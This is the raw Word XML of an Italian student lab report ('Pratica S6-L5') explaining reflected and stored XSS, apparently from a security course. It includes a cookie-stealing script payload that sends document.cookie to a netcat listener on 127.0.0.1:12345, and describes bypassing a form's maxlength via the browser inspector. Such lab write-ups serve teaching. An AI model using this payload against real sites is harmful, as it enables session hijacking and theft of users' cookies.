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86FB" w14:textId="6F0E87A7" w:rsidR="006021D8" w:rsidRDefault="006021D8">
      <w:r>
        <w:t>Pratica S6-L5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EB6AF36" w14:textId="77777777" w:rsidR="006021D8" w:rsidRDefault="006021D8"/>
    <w:p w14:paraId="37AA1623" w14:textId="706406F7" w:rsidR="006021D8" w:rsidRDefault="006021D8">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="486C2439" wp14:editId="292C0709">
            <wp:extent cx="6120130" cy="2684780"/>
            <wp:effectExtent l="0" t="0" r="1270" b="0"/>
            <wp:docPr id="949776248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76248" name="Immagine 1" descr="Immagine che contiene testo, schermata, Carattere, algebr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5CBA" w14:textId="77777777" w:rsidR="006021D8" w:rsidRDefault="006021D8"/>
    <w:p w14:paraId="37B3148B" w14:textId="39972DBB" w:rsidR="006021D8" w:rsidRDefault="006021D8">
      <w:r w:rsidRPr="006021D8">
        <w:t xml:space="preserve">XSS (Cross-Site Scripting) </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006021D8">
        <w:t>reflected</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006021D8">
        <w:t xml:space="preserve"> è una vulnerabilità di sicurezza su un sito web in cui gli attaccanti inseriscono script malevoli in input, come campi di ricerca o URL, che vengono poi riflesso </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="006021D8">
        <w:t>e</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006021D8">
        <w:t xml:space="preserve"> eseguiti dai browser degli utenti durante la visualizzazione della pagina. Ciò può consentire agli attaccanti di rubare informazioni sensibili degli utenti o compromettere la sicurezza del sito.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79B7FEA2" w14:textId="77777777" w:rsidR="006021D8" w:rsidRDefault="006021D8" w:rsidP="006021D8"/>
    <w:p w14:paraId="5CEA234B" w14:textId="064AAC13" w:rsidR="006021D8" w:rsidRDefault="006021D8" w:rsidP="006021D8">
      <w:r>
        <w:t xml:space="preserve">Per capire se un sito è vulnerabile a un attacco XSS (Cross-Site Scripting) </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>reflected</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>, puoi seguire questi tre passaggi:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D58E65D" w14:textId="77777777" w:rsidR="006021D8" w:rsidRDefault="006021D8" w:rsidP="006021D8"/>
    <w:p w14:paraId="768A49C2" w14:textId="77777777" w:rsidR="006021D8" w:rsidRDefault="006021D8" w:rsidP="006021D8">
      <w:r>
        <w:t xml:space="preserve">Input </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Validation</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="323C9EB9" w14:textId="77777777" w:rsidR="006021D8" w:rsidRDefault="006021D8" w:rsidP="006021D8"/>
    <w:p w14:paraId="5AA1F3CD" w14:textId="77777777" w:rsidR="006021D8" w:rsidRDefault="006021D8" w:rsidP="006021D8">
      <w:r>
        <w:t>In un sito vulnerabile a XSS, spesso l'input fornito dall'utente non viene validato o sanificato correttamente prima di essere mostrato nella pagina web. Puoi cercare campi di input, come campi di ricerca o forme, e inserire del testo con caratteri speciali o script JavaScript per vedere se vengono eseguiti quando la pagina viene visualizzata.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B1FF83F" w14:textId="191D0142" w:rsidR="006021D8" w:rsidRDefault="006021D8" w:rsidP="006021D8">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="08C5ED7D" wp14:editId="2F5D5029">
            <wp:extent cx="6120130" cy="1573530"/>
            <wp:effectExtent l="0" t="0" r="1270" b="1270"/>
            <wp:docPr id="956500460" name="Immagine 2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0460" name="Immagine 2" descr="Immagine che contiene testo, schermata, Carattere, line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E96D" w14:textId="77777777" w:rsidR="006021D8" w:rsidRDefault="006021D8" w:rsidP="006021D8"/>
    <w:p w14:paraId="1212DC16" w14:textId="22B093B9" w:rsidR="006021D8" w:rsidRDefault="006021D8" w:rsidP="006021D8">
      <w:r>
        <w:t>Analisi delle Risposte del Server:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7891FEF2" w14:textId="77777777" w:rsidR="006021D8" w:rsidRDefault="006021D8" w:rsidP="006021D8"/>
    <w:p w14:paraId="13EE8AA5" w14:textId="77777777" w:rsidR="006021D8" w:rsidRDefault="006021D8" w:rsidP="006021D8">
      <w:r>
        <w:t xml:space="preserve">Dopo aver inserito un payload potenzialmente dannoso in un campo di input, osserva la risposta del server. Se il testo inserito </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>viene restituito</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> senza essere sanificato o modificato, potrebbe essere un segno di vulnerabilità XSS </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>reflected</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01E4CF13" w14:textId="73ADC566" w:rsidR="006021D8" w:rsidRDefault="006021D8" w:rsidP="006021D8">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6C7ABE3B" wp14:editId="7A4922AB">
            <wp:extent cx="6120130" cy="1418590"/>
            <wp:effectExtent l="0" t="0" r="1270" b="3810"/>
            <wp:docPr id="1005422610" name="Immagine 6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22610" name="Immagine 6" descr="Immagine che contiene testo, schermata, Carattere, line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595A" w14:textId="77777777" w:rsidR="006021D8" w:rsidRDefault="006021D8" w:rsidP="006021D8"/>
    <w:p w14:paraId="4A1EED6B" w14:textId="77777777" w:rsidR="006021D8" w:rsidRDefault="006021D8" w:rsidP="006021D8"/>
    <w:p w14:paraId="414991D1" w14:textId="44837323" w:rsidR="006021D8" w:rsidRDefault="006021D8" w:rsidP="006021D8">
      <w:r>
        <w:t>Errori o Messaggi Anomali:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E6BC968" w14:textId="77777777" w:rsidR="006021D8" w:rsidRDefault="006021D8" w:rsidP="006021D8"/>
    <w:p w14:paraId="70B57959" w14:textId="5EACEBE9" w:rsidR="006021D8" w:rsidRDefault="006021D8" w:rsidP="006021D8">
      <w:r>
        <w:t>Cerca</w:t>
      </w:r>
      <w:r w:rsidR="005F42F4">
        <w:t>re</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> segni di errori o comportamenti anomali nella pagina dopo aver inserito il payload. Ad esempio, se vedi popup non attesi, messaggi di errore strani o comportamenti inusuali, potrebbe indicare una possibile vulnerabilità XSS.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CE2D189" w14:textId="11CCD464" w:rsidR="006021D8" w:rsidRDefault="006021D8"/>
    <w:p w14:paraId="163D0045" w14:textId="23119969" w:rsidR="006021D8" w:rsidRDefault="005F42F4">
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005F42F4">
        <w:t>Le cookie</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005F42F4">
        <w:t xml:space="preserve"> sono piccoli pezzi di dati memorizzati sul computer degli utenti dal loro browser web quando visitano un sito. Questi dati sono scambiati tra il browser e il server web e vengono utilizzati per mantenere informazioni di stato durante le sessioni web. </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005F42F4">
        <w:t>Le cookie</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005F42F4">
        <w:t xml:space="preserve"> sono comunemente utilizzate per memorizzare preferenze utente, dati di accesso, informazioni di carrello degli acquisti e altri dati relativi all'interazione dell'utente con un sito web. Sono essenziali per molte funzionalità web, ma vanno gestite attentamente per garantire la sicurezza e la privacy degli utenti.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DBE9E35" w14:textId="2AE32A61" w:rsidR="006021D8" w:rsidRDefault="006021D8"/>
    <w:p w14:paraId="3A30032D" w14:textId="6F0FC0D4" w:rsidR="005F42F4" w:rsidRDefault="005F42F4">
      <w:r>
        <w:t xml:space="preserve">Per eseguire l’attacco XSS </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>reflected</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> dopo che abbiamo verificato che l’input non e </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>sanato ,</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> inseriamo il nostro link che ci </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>permetira</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> di ricevere i cookies , prima però mettiamo NETCAT in ascolto nella porta 12345 .</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="306A5873" w14:textId="77777777" w:rsidR="005F42F4" w:rsidRDefault="005F42F4"/>
    <w:p w14:paraId="17687D73" w14:textId="01376086" w:rsidR="005F42F4" w:rsidRDefault="005F42F4">
      <w:r w:rsidRPr="005F42F4">
        <w:t>&lt;script&gt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005F42F4">
        <w:t>window.location</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005F42F4">
        <w:t xml:space="preserve">='http://127.0.0.1:12345/?cookie=' + </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005F42F4">
        <w:t>document.cookie</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005F42F4">
        <w:t>;&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49E9197F" w14:textId="77777777" w:rsidR="005F42F4" w:rsidRDefault="005F42F4"/>
    <w:p w14:paraId="79BA6E90" w14:textId="77777777" w:rsidR="005F42F4" w:rsidRDefault="005F42F4"/>
    <w:p w14:paraId="61E85425" w14:textId="2F80C4FF" w:rsidR="005F42F4" w:rsidRDefault="005F42F4">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7A1227DA" wp14:editId="16AE606F">
            <wp:extent cx="3251200" cy="444500"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="494477822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77822" name="Immagine 494477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ED57" w14:textId="77777777" w:rsidR="005F42F4" w:rsidRDefault="005F42F4"/>
    <w:p w14:paraId="11AA1D29" w14:textId="4F5C2417" w:rsidR="005F42F4" w:rsidRDefault="005F42F4">
      <w:r>
        <w:t xml:space="preserve">Inserendo il script </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sull</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>input ,</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>netcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> ci dara : </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BE6BED7" w14:textId="2890FB37" w:rsidR="005F42F4" w:rsidRDefault="005F42F4">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5D02246D" wp14:editId="508F65CA">
            <wp:extent cx="6119777" cy="2411361"/>
            <wp:effectExtent l="0" t="0" r="1905" b="1905"/>
            <wp:docPr id="1746008060" name="Immagine 8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08060" name="Immagine 8" descr="Immagine che contiene testo, schermata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254" cy="243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C74D" w14:textId="35FDAFEE" w:rsidR="007407FC" w:rsidRDefault="00E96AEE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="374151"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="374151"/>
        </w:rPr>
        <w:t xml:space="preserve">XSS (Cross-Site Scripting) </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="374151"/>
        </w:rPr>
        <w:t>stored</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="374151"/>
        </w:rPr>
        <w:t xml:space="preserve"> è una vulnerabilità di sicurezza su un sito web in cui gli attaccanti inseriscono script malevoli attraverso input come campi di testo o commenti. Questi script vengono memorizzati dal server e visualizzati quando altri utenti accedono alle pagine contenenti tali dati. Ciò consente agli attaccanti di eseguire script dannosi sui browser degli utenti che visualizzano il contenuto compromesso, mettendo a rischio la sicurezza delle informazioni e la privacy degli utenti.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3564C565" w14:textId="77777777" w:rsidR="00E96AEE" w:rsidRDefault="00E96AEE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="374151"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6751F6F0" w14:textId="7425F072" w:rsidR="00E96AEE" w:rsidRDefault="00E96AEE">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6E86495C" wp14:editId="71B2813B">
            <wp:extent cx="6120130" cy="1681480"/>
            <wp:effectExtent l="0" t="0" r="1270" b="0"/>
            <wp:docPr id="1726557040" name="Immagine 11" descr="Immagine che contiene testo, Carattere, linea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7040" name="Immagine 11" descr="Immagine che contiene testo, Carattere, linea, num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9BC2" w14:textId="36963AB5" w:rsidR="00044EDF" w:rsidRDefault="00044EDF">
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>Dal inserimento</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> capiamo che il </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>message</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> ha un limite di caratteri </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75FDFFB0" w14:textId="3C56FC9C" w:rsidR="00E96AEE" w:rsidRDefault="00E96AEE"/>
    <w:p w14:paraId="406170BF" w14:textId="77777777" w:rsidR="00E96AEE" w:rsidRDefault="00E96AEE"/>
    <w:p w14:paraId="29FD6DE5" w14:textId="0526FED8" w:rsidR="00E96AEE" w:rsidRDefault="00322053">
      <w:r>
        <w:t xml:space="preserve">In questo caso non possiamo inserire il nostro payload siccome e stato inserito un limite di </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>caratteri  ,</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> però </w:t>
      </w:r>
      <w:r w:rsidR="00044EDF">
        <w:t xml:space="preserve">entrando </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00044EDF">
        <w:t>nell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00044EDF">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00044EDF">
        <w:t>inspect</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00044EDF">
        <w:t xml:space="preserve"> , possiamo rimuovere il max </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00044EDF">
        <w:t>length</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00044EDF">
        <w:t xml:space="preserve"> , questo ci permette di inserire il nostro script .</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CFCF19C" w14:textId="77777777" w:rsidR="00E96AEE" w:rsidRDefault="00E96AEE"/>
    <w:p w14:paraId="12BA3453" w14:textId="055989C6" w:rsidR="00E96AEE" w:rsidRDefault="00E96AEE"/>
    <w:p w14:paraId="710F5711" w14:textId="05FD0815" w:rsidR="00044EDF" w:rsidRDefault="00044EDF">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="572BB078" wp14:editId="5E061BD6">
            <wp:extent cx="6119302" cy="1678613"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="1107196954" name="Immagine 15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96954" name="Immagine 15" descr="Immagine che contiene testo, software, Software multimediale, schermat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365" cy="168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84F3" w14:textId="5693CC3A" w:rsidR="00044EDF" w:rsidRDefault="00044EDF">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7F0EC1CE" wp14:editId="23E9A127">
            <wp:extent cx="6120130" cy="1390650"/>
            <wp:effectExtent l="0" t="0" r="1270" b="6350"/>
            <wp:docPr id="1204270968" name="Immagine 1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70968" name="Immagine 14" descr="Immagine che contiene testo, schermata, Carattere, line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B857" w14:textId="77777777" w:rsidR="00044EDF" w:rsidRDefault="00044EDF"/>
    <w:p w14:paraId="7FD9BB20" w14:textId="19F610F3" w:rsidR="00044EDF" w:rsidRDefault="00044EDF">
      <w:r>
        <w:t xml:space="preserve">Dopo questo passo l’attacco viene eseguito con </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>successo .</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="441DC868" w14:textId="77777777" w:rsidR="00044EDF" w:rsidRDefault="00044EDF"/>
    <w:p w14:paraId="5D1C9F02" w14:textId="2EF3C879" w:rsidR="00044EDF" w:rsidRDefault="00044EDF">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="595E9C9A" wp14:editId="2DAE58D3">
            <wp:extent cx="6120130" cy="1835785"/>
            <wp:effectExtent l="0" t="0" r="1270" b="5715"/>
            <wp:docPr id="1637788205" name="Immagine 16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88205" name="Immagine 16" descr="Immagine che contiene testo, schermata, Carattere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E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D8"/>
    <w:rsid w:val="00044EDF"/>
    <w:rsid w:val="00322053"/>
    <w:rsid w:val="005F42F4"/>
    <w:rsid w:val="006021D8"/>
    <w:rsid w:val="007407FC"/>
    <w:rsid w:val="00E9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B231B9"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{C8870425-97A7-B440-80B4-46ED1BC5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2024-01-22T14:23:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-01-22T15:20:00Z</dcterms:modified>
</cp:coreProperties>
</file>